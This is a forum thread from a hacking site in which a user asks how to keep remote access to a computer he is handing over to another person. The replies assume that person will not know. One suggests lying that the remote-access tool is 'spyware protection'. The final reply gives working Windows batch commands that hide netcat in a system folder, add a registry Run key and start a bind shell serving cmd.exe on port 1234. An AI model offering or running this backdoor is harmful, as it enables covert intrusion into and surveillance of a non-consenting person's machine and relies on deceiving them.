Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

0 0

I just rebuilt a machine here and I want to be able to remote connect to it. Should I just open a port and connect to that or netcat or cyrptcat? Could do a trojan but the computer is on my network and i will need the info of the computer when its on the other network. suggestions for that.

Banned
0 0

Edit: I see you wanted to use cryptcat. You could roll with that too.

Mad Hatter
0 0

network connection simple enough less you talkin' full control RAT

0 0

Remote connect to do what?

0 0

well i wouldn;t mind using a cryptcat. its just i wont have the network settings because the computer is on my network currently. so when it is switched to John Smiths network i wont know the settings.

0 0

If it is windows you can write a bat to notify you of the IP address when that computer boots up. Once you have that you can use anything you want to connect to it. If it is linux you can write a script for that too.

0 0

Maybe you could help me with this batch script?

0 0

http://www.ericphelps.com/batch/samples/ip.txt

Try that. I did this on a laptop a while back and it worked. I do remember having to fix a couple of problems but this is a starting point. I will assume that this person doesn't know you will be doing this so you may wish to provide yourself an up and running nc or cc listening on whatever port. If you are not concerned about the individual's computer knowledge then you can be bold and use PC-Anywhere or VNC. You can tell him it is a spyware protection program. :D

If you use these make sure that he isn't doing anything while you are.

Banned
0 0
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v NetCat /t reg_sz /d "%systemroot%\system32\drivers\etc\nc.exe -l -p1234 -d -e cmd.exe L"
copy "nc.exe" "%systemroot%\system32\drivers\etc\"
cd "%systemroot%\system32\drivers\etc"
nc.exe -l -p1234 -d -e cmd.exe L```

Change the -p switch to whatever port you plan on having netcat listen on.